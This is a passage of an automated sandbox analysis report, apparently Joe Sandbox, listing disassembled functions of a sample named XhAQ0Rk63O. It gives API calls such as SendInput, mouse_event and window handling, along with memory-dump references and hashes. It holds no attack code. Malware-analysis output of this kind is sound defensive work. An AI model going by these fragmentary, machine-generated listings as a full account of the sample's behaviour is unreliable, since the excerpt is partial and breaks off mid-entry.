                                                                                          • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                          Function 004336C7 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetClientRect.USER32(?,?), ref: 00433724
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                          • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                          • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                          • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                          • String ID:
                                                                                          • API String ID: 3220332590-0
                                                                                          • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                          • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                          • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                          • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                          Function 00457838 Relevance: 9.2, APIs: 6, Instructions: 176COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 1612042205-0
                                                                                          • Opcode ID: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                                          • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                                          • Opcode Fuzzy Hash: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                                          • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                          Function 0044C522 Relevance: 9.2, APIs: 6, Instructions: 155windowkeyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                          • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                          • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                          • SendInput.USER32 ref: 0044C6E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost$KeyboardState$InputSend
                                                                                          • String ID:
                                                                                          • API String ID: 2221674350-0
                                                                                          • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                          • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                          • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                          • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                          Function 00445153 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscpy$_wcscat
                                                                                          • String ID:
                                                                                          • API String ID: 2037614760-0
                                                                                          • Opcode ID: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                                          • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                          • Opcode Fuzzy Hash: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                                          • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                          Function 00447B66 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                          • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                          • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                          • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                          • String ID:
                                                                                          • API String ID: 4189319755-0
                                                                                          • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                          • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                          • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                          • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                                          Function 0044B474 Relevance: 9.1, APIs: 6, Instructions: 113fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                          • String ID:
                                                                                          • API String ID: 1726766782-0
                                                                                          • Opcode ID: 3a1f833abb26ce593740c71d471a220e6d34013d7717cf1b73c6152b0bb325a5
                                                                                          • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                          • Opcode Fuzzy Hash: 3a1f833abb26ce593740c71d471a220e6d34013d7717cf1b73c6152b0bb325a5
                                                                                          • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                                          Function 00441077 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                          • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                          • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                          • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                          • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 642888154-0
                                                                                          • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                          • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                                          • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                          • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                                          Function 00449063 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                          • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                          • String ID:
                                                                                          • API String ID: 1976402638-0
                                                                                          • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                          • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                          • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                          • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                          Function 00442582 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 00442597
                                                                                            • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                          • GetDesktopWindow.USER32 ref: 004425BF
                                                                                          • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                          • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                            • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                          • GetCursorPos.USER32(?), ref: 00442624
                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                          • String ID:
                                                                                          • API String ID: 4137160315-0
                                                                                          • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                          • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                          • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                          • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                          Function 00448851 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                          • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                          • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                          • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Enable$Show$MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 1871949834-0
                                                                                          • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                          • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                                          • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                          • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                                          Function 00449606 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 0044961A
                                                                                          • SendMessageW.USER32 ref: 0044964A
                                                                                            • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                                          • _wcslen.LIBCMT ref: 004496BA
                                                                                          • _wcslen.LIBCMT ref: 004496C7
                                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                                          • String ID:
                                                                                          • API String ID: 1624073603-0
                                                                                          • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                          • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                                          • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                          • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                                          Function 004416D1 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                          • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                                          • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                          • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                                          Function 0045552E Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                          • String ID:
                                                                                          • API String ID: 1640429340-0
                                                                                          • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                          • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                          • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                          • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                                          Function 00467E5E Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                                          • String ID:
                                                                                          • API String ID: 3354276064-0
                                                                                          • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                          • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                                          • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                          • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                                          Function 00455080 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                          • String ID:
                                                                                          • API String ID: 752480666-0
                                                                                          • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                          • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                          • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
